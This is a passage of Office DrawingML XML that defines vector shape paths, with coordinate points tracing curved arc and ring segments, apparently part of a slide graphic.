                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1160716" y="285419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1114679" y="301383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1069416" y="318935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024953" y="338048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="981341" y="358673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938580" y="380796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="896734" y="404380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855814" y="429387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="815848" y="455790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="776884" y="483552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="738949" y="512648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="702068" y="543039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="666280" y="574700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631609" y="607606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="598081" y="641705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="565746" y="676973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="534619" y="713384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504748" y="750912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="476148" y="789495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448856" y="829132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422897" y="869784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398322" y="911415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375145" y="953985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353390" y="997470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333121" y="1041844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314337" y="1087069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297078" y="1133106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="281393" y="1179944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267284" y="1227531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254812" y="1275829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243992" y="1324825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="291109" y="1324825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302234" y="1276908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315010" y="1229677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="329399" y="1183157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="345376" y="1137386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="362889" y="1092415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381927" y="1048258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402437" y="1004951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="424408" y="962520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="447802" y="921016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="472579" y="880465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="498703" y="840892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="526161" y="802335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554901" y="764819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584898" y="728395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616127" y="693089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648550" y="658926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="682129" y="625944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716826" y="594169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752640" y="563651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="789508" y="534403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="827405" y="506476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866305" y="479882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="906170" y="454672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="946975" y="430885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="988669" y="408533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031252" y="387654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074661" y="368287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118882" y="350456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1163866" y="334213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1209598" y="319570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1256042" y="306565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1303172" y="295236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1303172" y="247357"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3161665" h="3211195">
                <a:moveTo>
                  <a:pt x="2447696" y="2948013"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2408453" y="2908262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2366238" y="2934716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2323401" y="2959646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2279954" y="2983065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2235962" y="3004972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2191435" y="3025381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2146427" y="3044266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100973" y="3061639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2055101" y="3077502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2008860" y="3091865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1962289" y="3104705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1915414" y="3116034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1868271" y="3125863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1820913" y="3134169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1773364" y="3140976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1725676" y="3146260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1677860" y="3150044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629981" y="3152305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1582064" y="3153054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1534134" y="3152305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1486255" y="3150044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1438440" y="3146260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1390751" y="3140976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1343202" y="3134169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295844" y="3125863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1248702" y="3116034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201826" y="3104705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1155255" y="3091865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1109014" y="3077502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1063142" y="3061639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1017689" y="3044266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="972680" y="3025381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928154" y="3004972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="884161" y="2983065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840714" y="2959646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="797877" y="2934716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="755675" y="2908262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716432" y="2948013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757986" y="2974949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800188" y="3000438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="843000" y="3024454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="886396" y="3047022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="930338" y="3068129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974775" y="3087789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019683" y="3105988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1065022" y="3122726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110767" y="3138017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1156868" y="3151848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1203299" y="3164230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1250010" y="3175139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1296974" y="3184601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1344155" y="3192615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1391526" y="3199168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1439024" y="3204260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1486649" y="3207905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1534337" y="3210090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1582051" y="3210814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629778" y="3210090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1677466" y="3207905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1725091" y="3204260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1772589" y="3199168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1819960" y="3192615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1867141" y="3184601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1914105" y="3175139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1960816" y="3164230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2007247" y="3151848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2053348" y="3138017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2099094" y="3122726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2144433" y="3105988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2189340" y="3087789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2233777" y="3068129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2277719" y="3047022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321115" y="3024454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2363927" y="3000438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2406129" y="2974949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2447696" y="2948013"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3161665" h="3211195">
                <a:moveTo>
                  <a:pt x="2447696" y="263740"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2406129" y="236715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2363927" y="211150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321115" y="187032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2277719" y="164388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2233777" y="143192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2189340" y="123469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2144433" y="105206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2099094" y="88404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2053348" y="73063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2007247" y="59182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1960816" y="46761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1914105" y="35801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1867141" y="26301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1819960" y="18262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1772589" y="11684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1725091" y="6578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1677466" y="2921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629778" y="736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1582051" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1534337" y="736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1486649" y="2921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1439024" y="6578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1391526" y="11684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1344155" y="18262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1296974" y="26301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1250010" y="35801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1203299" y="46761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1156868" y="59182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110767" y="73063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1065022" y="88404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019683" y="105206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974775" y="123469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="930338" y="143192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="886396" y="164388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="843000" y="187032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800188" y="211150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757986" y="236715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716432" y="263740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="755675" y="303745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="797877" y="277202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840714" y="252171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="884161" y="228663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928154" y="206667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="972680" y="186194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1017689" y="167233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1063142" y="149783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1109014" y="133858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1155255" y="119443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201826" y="106553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1248702" y="95173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295844" y="85318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1343202" y="76974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1390751" y="70142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1438440" y="64833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1486255" y="61036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1534134" y="58762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1582051" y="58013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629981" y="58762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1677860" y="61036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1725676" y="64833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1773364" y="70142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1820913" y="76974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1868271" y="85318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1915414" y="95173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1962289" y="106553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2008860" y="119443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2055101" y="133858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100973" y="149783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2146427" y="167233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2191435" y="186194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2235962" y="206667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2279954" y="228663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2323401" y="252171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2366238" y="277202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2408453" y="303745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2447696" y="263740"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3161665" h="3211195">
                <a:moveTo>
                  <a:pt x="2917088" y="1888705"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2869971" y="1888705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2858833" y="1936508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2846057" y="1983613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2831668" y="2030006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2815691" y="2075637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2798178" y="2120493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2779141" y="2164537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2758630" y="2207717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2736659" y="2250033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2713266" y="2291423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2688488" y="2331859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2662364" y="2371331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2634907" y="2409774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2606167" y="2447175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2576169" y="2483497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2544940" y="2518714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2512517" y="2552776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2478938" y="2585669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2444242" y="2617343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2408428" y="2647785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2371560" y="2676944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2333663" y="2704795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2294763" y="2731300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2254897" y="2756433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2214092" y="2780157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2172398" y="2802445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2129815" y="2823260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2086406" y="2842577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2042185" y="2860344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1997202" y="2876537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1951469" y="2891129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905025" y="2904096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1857908" y="2915374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1857908" y="2963126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1906079" y="2952153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1953564" y="2939504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2000351" y="2925203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2046389" y="2909290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2091651" y="2891790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2136114" y="2872740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2179726" y="2852166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2222487" y="2830106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2264333" y="2806598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2305253" y="2781655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2345220" y="2755328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2384183" y="2727642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2422118" y="2698635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2458999" y="2668320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494788" y="2636748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2529459" y="2603944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2562987" y="2569934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2595321" y="2534755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2626449" y="2498445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2656319" y="2461031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2684919" y="2422550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2712212" y="2383028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2738170" y="2342489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2762745" y="2300973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2785922" y="2258517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807678" y="2215159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2827947" y="2170912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2846730" y="2125815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2863989" y="2079891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2879674" y="2033193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2893784" y="1985746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2906255" y="1937575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2917088" y="1888705"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3161665" h="3211195">
                <a:moveTo>
                  <a:pt x="2917088" y="1324825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2906255" y="1275829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2893784" y="1227531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2879674" y="1179944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2863989" y="1133106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2846730" y="1087069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2827947" y="1041844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807678" y="997470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2785922" y="953985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2762745" y="911415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2738170" y="869784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2712212" y="829132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2684919" y="789495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2656319" y="750912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2626449" y="713384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2595321" y="676973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2562987" y="641705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2529459" y="607606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494788" y="574700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2458999" y="543039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2422118" y="512648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2384183" y="483552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2345220" y="455790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2305253" y="429387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2264333" y="404380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2222487" y="380796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2179726" y="358673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2136114" y="338048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2091651" y="318935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2046389" y="301383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2000351" y="285419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1953564" y="271068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1906079" y="258381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1857908" y="247357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1857908" y="295236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905025" y="306565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1951469" y="319570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1997202" y="334213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2042185" y="350456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2086406" y="368287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2129815" y="387654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2172398" y="408533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2214092" y="430885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2254897" y="454672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2294763" y="479882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2333663" y="506476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2371560" y="534403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2408428" y="563651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2444242" y="594169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2478938" y="625944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2512530" y="658926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2544940" y="693089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2576169" y="728395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2606167" y="764819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2634907" y="802335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2662364" y="840892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2688488" y="880465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2713266" y="921016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2736659" y="962520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2758630" y="1004951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2779141" y="1048258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2798178" y="1092415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2815691" y="1137386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2831668" y="1183157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2846057" y="1229677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2858833" y="1276908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2869971" y="1324825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2917088" y="1324825"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3161665" h="3211195">
                <a:moveTo>
                  <a:pt x="3161068" y="1582407"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3159709" y="1535226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3156966" y="1488097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3152876" y="1441056"/>
                </a:lnTo>
